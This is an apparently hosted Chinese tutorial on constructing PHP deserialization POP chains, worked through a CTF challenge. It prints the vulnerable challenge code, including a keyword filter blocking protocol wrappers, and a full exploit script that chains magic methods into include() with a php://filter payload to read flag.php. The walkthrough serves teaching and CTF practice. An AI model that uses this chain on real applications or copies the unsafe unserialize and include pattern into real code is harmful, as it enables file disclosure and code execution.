php反序列化pop鏈構(gòu)造知識(shí)點(diǎn)有哪些

本篇內(nèi)容主要講解“php反序列化pop鏈構(gòu)造知識(shí)點(diǎn)有哪些”，感興趣的朋友不妨來看看。本文介紹的方法操作簡單快捷，實(shí)用性強(qiáng)。下面就讓小編來帶大家學(xué)習(xí)“php反序列化pop鏈構(gòu)造知識(shí)點(diǎn)有哪些”吧!

pop鏈構(gòu)造

一般的反序列化題目，存在漏洞或者能注入惡意代碼的地方在魔術(shù)方法中，我們可以通過自動(dòng)調(diào)用魔術(shù)方法來達(dá)到攻擊效果。但是當(dāng)注入點(diǎn)存在普通的類方法中，通過前面自動(dòng)調(diào)用的方法就失效了，所以我們需要找到普通類與魔術(shù)方法之間的聯(lián)系，理出一種邏輯思路，通過這種邏輯思路來構(gòu)造一條pop鏈，從而達(dá)到攻擊的目的。所以我們在做這類pop題目一定要緊盯魔術(shù)方法。

pop鏈簡介

它是一種面向?qū)傩跃幊蹋Ｓ糜跇?gòu)造調(diào)用鏈的方法。在題目中的代碼里找到一系列能調(diào)用的指令，并將這些指令整合成一條有邏輯的能達(dá)到惡意攻擊效果的代碼，就是pop鏈（個(gè)人理解，歡迎師傅們提出意見）在構(gòu)造pop鏈中，魔術(shù)方法必不可少。下面將通過一個(gè)例題來說pop鏈?zhǔn)窃趺礃?gòu)造的，以及具體構(gòu)造的思路

上題目代碼：

Welcome to index.php
<?php
//flag is in flag.php
//WTF IS THIS?
//Learn From https://ctf.ieki.xyz/library/php.html#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%AD%94%E6%9C%AF%E6%96%B9%E6%B3%95
//And Crack It!
class Modifier {
    protected  $var;
    public function append($value){
        include($value);
    }
    public function __invoke(){
        $this->append($this->var);
    }
}

class Show{
    public $source;
    public $str;
    public function __construct($file='index.php'){
        $this->source = $file;
        echo 'Welcome to '.$this->source."<br>";
    }
    public function __toString(){
        return $this->str->source;
    }

    public function __wakeup(){
        if(preg_match("/gopher|http|file|ftp|https|dict|\.\./i", $this->source)) {
            echo "hacker";
            $this->source = "index.php";
        }
    }
}

class Test{
    public $p;
    public function __construct(){
        $this->p = array();
    }

    public function __get($key){
        $function = $this->p;
        return $function();
    }
}

if(isset($_GET['pop'])){
    @unserialize($_GET['pop']);
}
else{
    $a=new Show;
    highlight_file(__FILE__);
}

構(gòu)造思路

在構(gòu)造調(diào)用鏈時(shí)，先找到調(diào)用鏈的頭和尾。頭一般都是能傳參以及可以反序列化的地方，而尾部一般都是可以執(zhí)行惡意代碼的地方。審計(jì)這個(gè)題的代碼，頭是用get方式對(duì)pop傳參，而尾部是include包含函數(shù)。到這里，我們應(yīng)該都知道是要用php偽協(xié)議讀取flag文件的源碼。既然頭和尾都找到了，也知道了攻擊方法。那么接下來找到題目中的魔術(shù)方法。

__invoke()    當(dāng)一個(gè)類被當(dāng)作函數(shù)執(zhí)行時(shí)調(diào)用此方法。

__construct   在創(chuàng)建對(duì)象時(shí)調(diào)用此方法

__toString()  在一個(gè)類被當(dāng)作字符串處理時(shí)調(diào)用此方法

__wakeup()    當(dāng)反序列化恢復(fù)成對(duì)象時(shí)調(diào)用此方法

__get()       當(dāng)讀取不可訪問或不存在的屬性的值會(huì)被調(diào)用

題中一共有這五種魔術(shù)方法。接著找出普通類與魔術(shù)方法之間的聯(lián)系。

不難看出wakeup函數(shù)中有個(gè)preg_match函數(shù)，用于查找source中敏感的字符串，我們可以從這里開頭，將source賦予一個(gè)show類，那么會(huì)自動(dòng)觸發(fā)toString函數(shù)，那么現(xiàn)在就要在tostring方法中延申鏈子，那么我們可以在totring方法中$this->str賦予test類，在test類讀取source變量，（因?yàn)閠est類中沒有source屬性，則是訪問了不可訪問的屬性）則會(huì)自動(dòng)調(diào)用get魔術(shù)方法。可以發(fā)現(xiàn)get方法中有個(gè)函數(shù)調(diào)用，則我們可以將$this->p賦予Modifier類，會(huì)自動(dòng)調(diào)用invoke方法，從而執(zhí)行我們寫入的php偽協(xié)議（將Modifer類中的var屬性賦值為我們的惡意代碼）

至此，我們構(gòu)造pop鏈。

pop鏈講解

<?php
class Modifier {
	protected $var='php://filter/read=convert.base64-encode/resource=flag.php';
}
class Show{
	public $source;
	public $str;
	function _construct(){
		$this->source=$file;
	}
}
class Test{
	public $p;
}
$a = new show();
$b = new show();
$c = new test();
$d = new Modifier();
$a->source=$b;
$b->str=$c;
$c->p= $d;
echo urlencode(serialize($a));
?>

先把用到的類寫出來，形成一個(gè)框架，再表明類中的變量。分別將用到的類進(jìn)行實(shí)例化，這里為什么要new 兩次show（看代碼應(yīng)該能看懂，第一次是實(shí)例化show類,第二次是將第一次實(shí)例化后的show類中的source=第二次實(shí)例化的show）

在我們進(jìn)行序列化的時(shí)候盡量用url編碼一下（在這個(gè)題中有protected修飾的屬性，會(huì)有不可見字符）

到此，相信大家對(duì)“php反序列化pop鏈構(gòu)造知識(shí)點(diǎn)有哪些”有了更深的了解，不妨來實(shí)際操作一番吧！這里是億速云網(wǎng)站，更多相關(guān)內(nèi)容可以進(jìn)入相關(guān)頻道進(jìn)行查詢，關(guān)注我們，繼續(xù)學(xué)習(xí)！